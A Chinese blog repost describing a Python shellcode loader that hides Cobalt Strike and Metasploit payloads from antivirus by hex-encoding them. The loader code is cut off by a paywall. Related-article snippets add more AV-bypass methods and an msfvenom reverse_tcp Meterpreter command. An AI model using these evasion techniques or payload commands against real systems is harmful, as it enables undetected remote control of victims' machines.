[原创]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)

最新推荐文章于 2025-06-23 17:17:42 发布
转载 最新推荐文章于 2025-06-23 17:17:42 发布 · 5.1k 阅读 · 10 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/k8gege/p/11223393.html
文章标签:

#python #c#

本文介绍了如何使用Python和C#创建ShellCode加载器,以实现免杀效果。通过将ShellCode转化为HEX格式,避免了被杀毒软件查杀的问题,并通过加载器执行。文章对比了不同格式ShellCode的查杀情况,提供了Python加载器ScRunHex.py的代码示例,并讨论了Base64编码进一步加密的可能性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x001 原理

采用分离法,即将ShellCode和加载器分离。方法较LOW但免杀。

本文主要将ShellCode转成HEX,再通过加载器执行ShellCode。

PS: 何为SC加载器,即专门用于加载所提供ShellCode的工具。

如同HTTP发包工具,支持提交HTTP,写死参数最多只能叫EXP。

再详细点,打个比方,你只会炒一个菜,你敢说你是厨师吗?

0x002 ShellCode免杀

CS可生成很多种格式的ShellCode,具体该用哪一种呢?

由于部分杀软会查杀ShellCode文件,所以不能直接使用RAW。

其实不用测都知道HEX字串肯定比RAW或标准C格式安全。

因为RAW和标准C格式一直以来都比较常用,被杀一点都不奇怪。

当然实际上使用任意格式都可以,前提是需要加解密。

下面我们拿CS3.13的ShellCode来做个对比,结果如下

CS生成Raw格式的ShellCode被7个杀软查杀(payload.bin)
http://r.virscan.org/language/zh-cn/report/a24430ec84bdb3dd3ee0b7a1aa501635
将CS的ShellCode转成Hex无一杀软查杀(hex.txt)
http://r.virscan.org/language/zh-cn/report/fe7412921c7acc9d69b0da72793cd57d

0x003 加载器

以python为例,这个无脑的语言开发比较快。要使用其它加解密算法也非常简单

缺点就是文件有点大而已,不过问题不大,毕竟在免杀面前2M也是能接受的哈哈。

其它语言也同理啊,大家不要纠结用什么语言来写工具。用PY只是便于大家理解

ScRunHex.py

#scrun by k8gege
import ctypes
import sys
#calc.exe
#sc = "DBC3D97424F4BEE85A27135F31C9B13331771783C704039F49C5E6A38680095B57F380BE6621F6CBDBF57C99D77ED00963F2FD3EC4B9DB71D50FE4DD1511981F4AF1A1D09FF0E60C6FA0BF5BC255CB19DF541B165F2F1EE814
最低0.47元/天 解锁文章

200万优质内容无限畅学
Python火绒、360和Defender
江左盟的博客
10-10 2万+
目录 简介 环境 原理 加载ShellCode 定位特征码 Base64编码绕过 简介 之前学习都是使用Metasploit自带的编码进行,从未成功过。也使用过GitHub上别人提供的方法,最近学习并实践发现绕过国内的毒软件貌似并不难,本文使用手工分析特征码,使用base64编码绕过毒软件静态分析。虽然使用的方法比较简单,但对实际做研究还是有一定意义的。 环境 Windows 10 x64 Python 3.8.3 Pyinstaller 火绒版本:5.0..
Python3 Cobalt strike shellcode 过 360 卫士和360
课嗨教育的专栏
09-09 768
Python2.7 现在很多毒软件都会查效果有点差。可以使用 python3 来做 shellcode处理。 Python3 下载下载最新的版本当前实验的版本是 Python 3.8.6 64 位pyinstaller 4.0 https://www.python.org/downloads/pip install pyinstaller Python3 shellcode 加载代码import ctypes #shellcode 加载 def shel...
绕过AV:shellcode加载器
03-04
旁路AV 条件触发式远控VT 6/70国内软及后卫,卡巴斯基等主流软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
-Shellcode分离隐藏&C++
qq_45087791的博客
02-27 3042
Shellcode分离隐藏-让毒找不到。离包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的ShellCode通过分块传输的方法上传然后再拼接,这些体现了基本的"分离"思想。
[特殊字符] Cobalt Strike SMB 漏洞利用实战指南(优化)
最新发布
Liu_Bruce的博客
06-23 953
这篇实战指南详细介绍了利用Cobalt Strike结合SMB漏洞(CVE-2020-0796)进行渗透测试的完整流程。主要内容包括:1) 生成高度混淆的Shellcode;2) 配置SMB Beacon监听器;3) 漏洞利用执行流程详解;4) 多种增强技术如Shellcode分片注入、合法进程挂载和流量伪装;5) 完整的攻击执行步骤和结果验证方法;6) 高级规避方案如内核回调清除和ETW绕过。文章特别强调需在授权环境下操作,并提供专业建议通过组合漏洞(CVE-2020-0796+Zerologon
msf shellcode分离技术
渗透之路,攻防之间皆学问
05-27 2114
一般的shellcode是直接放在程序里面执行,分离是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf shellcode分离
Shellcode分离加载实现的两种方式(VT率:1/68)
xf555er的博客
05-24 3267
本文详细介绍了如何通过文件加载和远程URL加载方式实现Shellcode分离加载,以规避安全软件的检测。文章首先描述了通过Metasploit Framework生成的shellcode文件加载的过程,并提供了相关的C++代码。为了避毒软件检测,利用动态API调用和lazy_importer项目进行代码优化。其次,文章讨论了如何通过远程URL加载shellcode,也提供了相应的实现代码。
msf 生成 shellcode 利用 python 加载
YingZi's Blog
08-04 2147
msf 生成 shellcode 利用 python 加载 前言 网上有很多教程,但是可能教程中的payload 放到本地就是没有办法跑起来 例如这种报错就是shellcodeloader的问题 # 商业转载请联系作者获得授权,非商业转载请注明出处。 # For commercial use, please contact the author for authorization. For non-commercial use, please indicate the source. # 协议(L
ShellCode-Loader - Msf&CobaltStrikeShellCode加载器
11-19
ShellCode-Loader是一个通过Msf(Metasploit Framework)和Cobalt Strike进行ShellCode加载的工具。Metasploit是一个用于渗透测试和安全研究的平台,它提供了用于发现安全漏洞并开发exploit代码的工具。Cobalt ...
shellcode加载器
10-02
综上所述,这个shellcode加载器的组合可能是一个用于渗透测试或研究目的的工具,使用者可以通过Python脚本加载和执行加密过的shellcode,并且可以与Cobalt Strike和Metasploit Framework兼容,提高了在目标系统上...
cobaltstrike
02-26
### Cobalt Strike 技巧和实现方法 #### 1. 使用 GobypassAV-shellcode 开源项目 GobypassAV-shellcode 是一个专注于 Cobot Strike 的技术的开源项目。此项目提供了一种有效的方法来避开主流毒软件(如...
Python shellcode
qq_25761407的博客
04-02 5873
Python shellcode
python3 cobalt strike msf shellcode反序列化bypass 360,火绒
sweelg的博客
09-07 1038
本文仅以分离为例,利用Python语言制作加载器Cobaltstrike生成的Shellcode进行绕过软作为样例,举例说明通过加密Shellcode、分离以及Python反序列化达到bypass的思路和方法。 原理: 我们原始的shellcode加载器是直接把shellcode放在里面进行运行,然而我们的分离 整体流程是将我们的Shellcode与程序进行分离,而上传到目标的可执行程序仅作为一个类似于下载器的程序使用,例如我们可以搭建一个Http Server,之后构造我们的Shel
ShellCode的一些方法
qq_68890680的博客
06-26 763
申请内存空间:VirtualAlloc(在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态分配的内存初始化为零)、VirtualAlloc2(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。该函数将其分配的内存初始化为零)、VirtualAllocEx(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。常见的加密解密方式:AES加密、hex加密、XOR+base64加密、Base85+XOR+RC4。加载方式:基础加载,纤程加载,远程加载。
python加载器_利用Python反序列化运行加载器实现
weixin_36266554的博客
02-04 600
前言前几天在看Pythonshellcode加载器,在网上找了一个,结果加载器自身就过不了火绒,测试发现是火绒对关键语句进行了识别。 所以我们要想办法去掉加载器中明显的特征。原理及实现在绕过静态查方面,主要就是要隐藏特征,比较常见的就是各种混淆、加密,但加密后的代码到最终还是需要去执行它才行,代码执行这一个操作其实特征也是很明显的,像exec、eval、os.system、subprocess...
CobaltStrike木马代码篇之python反序列化分离()
xf555er的博客
11-21 2038
本篇文章主要用到python来对CobaltStrike生成的Shellcode进行分离处理, 因此要求读者要有一定的python基础, 下面我会介绍pyhon反序列化所需用到的相关函数和库
Metasploit+python生成exe过360
weixin_30900589的博客
04-29 942
Metasploit+python生成exe过360毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /opt/bk.py 2...
】分离python
zhangshuaiijie的博客
06-28 880
shellcode是一段用于利用软件漏洞的有效负载代码,以其经常让攻击者获得shell而得名shellcode loader加载器是用来运行shellcode加载器,用什么语言来写都可以思路就是将shellcode和loader分离开来,用loader加载存在于普通文件中的shellcode
马学习(分离)
红队是青春
02-19 435
马之分离学习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值